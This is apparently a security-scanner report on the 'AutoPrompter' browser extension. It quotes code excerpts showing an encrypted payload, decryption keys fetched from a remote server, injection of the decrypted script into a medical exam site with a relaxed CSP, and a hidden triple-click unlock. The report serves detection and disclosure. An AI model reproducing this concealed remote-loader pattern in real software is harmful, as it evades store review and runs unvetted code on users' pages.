AutoPrompter

AutoPrompter

ID: kahamicjejhaidgegolgnglolbmojahl

Supported Languages

πŸ‡ΊπŸ‡ΈUS English

Extension Info & Metadata

Status
Active
Version
1.0.2
Size
0.88 MB
Rating
0.0/5
Reviews
0
Users
500,000
Type
Extension
Updated
Jul 5, 2026
Category
Developer tools
Price
Free
Featured
No
Visibility
Listed
Mature
No
By Google
No
Trusted
No

Publisher Contextual Analysis

MX records exist
Yes
Domain exists
Yes
Is disposable
No
Is role-based
No
Mailbox exists
Yes
Total Extensions
2
Active
2
Obsolete
0
Listed
2
Unlisted
0
Total Users
500,030
Screenshot 1

Automated URL-based prompting for ChatGPT, Claude, and Gemini.

Item
Type
Severity
Description
scripting
Permission
Critical
This permission allows injection and execution of JavaScript on any webpage. Rated Critical because it can modify page content, steal sensitive data, and inject malicious code into any site the extension has access to.
<all_urls>
Host
Critical
Broad host access β€” the extension can read/modify content on every website.
Broad Host Permissions
Risk Factor
High
This extension has broad host permissions allowing it to access many or all websites.
Broad Content Script Access
Risk Factor
High
This extension can inject scripts into any website.
storage
Permission
Medium
This permission allows storing data locally in the browser. Rated Medium because it can persist sensitive user data, track user activities over time, and potentially store malicious payloads.
userScripts
Permission
Unknown
No classification available for this permission.

The extension ships a ~49 KB AES-GCM encrypted blob as its primary secondary payload. The plaintext is never visible in the bundle and can only be recovered with a runtime master key, defeating all static analysis. A payload this large (larger than all other JS combined) that is intentionally opaque constitutes real obfuscation, not standard bundler output.

background/toolkit-payload.js (Line 1)
export const encryptedToolkit = {    ivHex: 'f105651055d00c9ebfa48eee',    payloadHex: '5ebf16b4563c5a47a73c6b03a85792baf1b2e80ea9f0088034090963ff1e6495acd63488dfe6815a97ca5432b81d00f81a1ad1e54d72a3d4e6507bd5252705771cf471b7f94f03cea9ad69a181077b719cd1a734247db351f7c5cf9ce7007987d509ce2527144c68a78c8bb43a7ab713035068adbb939c22cc6fac026cd610eaffb3e29e8e1ac9ee69e543d4aeb61bd40312529cfff3f29288166b1a2297ba989d74e26ecb28c168d71b166eeebe3c960becf7e79c1ce56d979accda381ead626370070c09824796eec5fd96346032 ...

The decryption master key for the encrypted toolkit payload is not stored locally β€” it is fetched from a remote server at `halfpastbored.com`. This gives the publisher the ability to add, revoke, or rotate keys at will, and to update the effective behaviour of the extension without pushing a new version simply by changing what keys decrypt what payload. This is a remote code control mechanism that bypasses Chrome's extension review process.

options/debug-inject.js (Line 23)
async function unlockIntegration(pwd) {    const encoder = new TextEncoder();    const pwdHashBuf = await crypto.subtle.digest('SHA-256', encoder.encode(pwd));    const pwdHashHex = Array.from(new Uint8Array(pwdHashBuf))      .map(b => b.toString(16).padStart(2, '0'))      .join('');    let keysData;    try {      const res = await fetch('https://halfpastbored.com/extensions/autoprompter/keys.json');      keysData = await res.json();    } catch (_e) {      throw new Error('Network error reaching integration server.');    }    const entry = keysData[pwdHashHex];    if (!entry) throw new Error('Access denied. Invalid key.');

The service worker decrypts the encrypted toolkit payload and registers the resulting plaintext as a `userScript` injected into an arbitrary platform URL (default `*://apps.uworld.com/*`, user-configurable to any pattern). The decrypted code is then executed as a first-class userScript with `csp: "script-src 'self' 'unsafe-inline'"`, bypassing the target page's own CSP. Since the payload content is opaque, the full scope of what executes on these third-party pages cannot be determined by static analysis.

background/service-worker.js (Line 119)
} else if (id === 'toolkit') {  // Try to load raw backup first (dev mode)  try {    const res = await fetch(chrome.runtime.getURL('.private/userscript-backup.js'));    code = await res.text();  } catch (_e) {    // Decrypt from payload if we have master key    try {      const {        encryptedToolkit      } = await import('./toolkit-payload.js');      const mkBuf = new Uint8Array(storage.toolkit_mk.match(/.{1,2}/g)        .map(byte => parseInt(byte, 16)));      const ivBuf = new Uint8Array(encryptedToolkit.ivHex.match(/.{1,2}/g)        .map(byte => parseInt(byte, 16)));      const payloadBuf = new Uint8Array(encryptedToolkit.payloadHex.match(/.{1,2}/g)        .map(byte => parseInt(byte, 16)));      const key = await crypto.subtle.importKey('raw', mkBuf, 'AES-GCM', false, ['decrypt']);      const decryptedBuf = await crypto.subtle.decrypt({        name: 'AES-GCM',        iv: ivBuf      }, key, payloadBuf);      const decoder = new TextDecoder();      code = decoder.decode(decryptedBuf);      // ...    }  }}

A hidden "Personal Workspace Integration" UI β€” which unlocks the encrypted toolkit for injection onto UWorld (a medical exam platform) β€” is triggered only by triple-clicking the extension logo within one second. This secret gesture is not documented, disclosed in the CWS listing, or discoverable by a normal user. Deliberately concealing a secondary feature that injects AI assistance into a medical licensing exam platform behind a secret activation mechanism is a strong indicator of intentional deception to evade policy review.

options/debug-inject.js (Line 1)
let logoClickCount = 0;let logoClickTimer = null;let currentMasterKey = null;const targetLogo = document.querySelector('.logo-container');if (targetLogo) {  targetLogo.addEventListener('click', () => {    logoClickCount++;    if (logoClickCount === 3) {      document.getElementById('integration-modal').style.display = 'flex';      logoClickCount = 0;      document.getElementById('integration-key-input').focus();    }    clearTimeout(logoClickTimer);    logoClickTimer = setTimeout(() => {      logoClickCount = 0;    }, 1000);  });

By severity

Critical0
High4
Medium0
Low0

Versions scanned

Showing 1 of 3 scanned versions with more than one unique finding. Counts are unique findings that include each version.

Extension VersionCode Review Findings
1.0.24

Files with findings

3 distinct paths β€” top paths by unique finding count:

  • options/debug-inject.js2
  • background/service-worker.js1
  • background/toolkit-payload.js1
S.No.
Category
Severity
File
Summary
Found in Version
1Obfuscation
high
background/toolkit-payload.js (line 1)The extension ships a ~49 KB AES-GCM encrypted blob as its primary secondary payload. The plaintext is never visible in the bundle and can only be recovered with a runtime master key, defeating all static analysis. A …
2Other
high
options/debug-inject.js (line 1)A hidden "Personal Workspace Integration" UI β€” which unlocks the encrypted toolkit for injection onto UWorld (a medical exam platform) β€” is triggered only by triple-clicking the extension logo within one second. This …
3Remote Code Loading
high
options/debug-inject.js (line 23)The decryption master key for the encrypted toolkit payload is not stored locally β€” it is fetched from a remote server at `halfpastbored.com`. This gives the publisher the ability to add, revoke, or rotate keys at wil…
4Remote Code Loading
high
background/service-worker.js (line 119)The service worker decrypts the encrypted toolkit payload and registers the resulting plaintext as a `userScript` injected into an arbitrary platform URL (default `*://apps.uworld.com/*`, user-configurable to any patt…
URLs
8
IPv4
0
IPv6
0

URLs

View the external URLs this extension communicates with to understand its network activity and data interactions.

Gain full insight into all external connections.

Upgrade for full visibility.

chromewebstore.google.com/detail/autoprompter/YOUR_CHROME_IDhttps://chromewebstore.google.com/detail/autoprompter/YOUR_CHROME_ID
addons.mozilla.org/en-US/firefox/addon/autoprompter/https://addons.mozilla.org/en-US/firefox/addon/autoprompter/
microsoftedge.microsoft.com/addons/detail/autoprompter/YOUR_EDGE_IDhttps://microsoftedge.microsoft.com/addons/detail/autoprompter/YOUR_EDGE_ID
chatgpt.com-https://chatgpt.com/#autoprompter-q=Tell+me+a+joke
claude.ai/newhttps://claude.ai/new#autoprompter-q=Write+a+poem+about+robots
gemini.google.com/apphttps://gemini.google.com/app#autoprompter-q=Explain+quantum+physics
halfpastbored.com/extensions/autoprompter/keys.jsonhttps://halfpastbored.com/extensions/autoprompter/keys.json
halfpastbored.com/extensions/autoprompterhttps://halfpastbored.com/extensions/autoprompter

Gain full insight into all external connections.

Upgrade for full visibility.

No IP addresses found
Showing 1 to 3 of 10 rows
Rows per page:

Code Diff

Compare extension code between any two versions.

0 changed files (scanned top 25 shared text files)

No comparable text files found between these versions.

Browse and explore files within this extension package

Gain full insight into all external connections.

Upgrade for full visibility.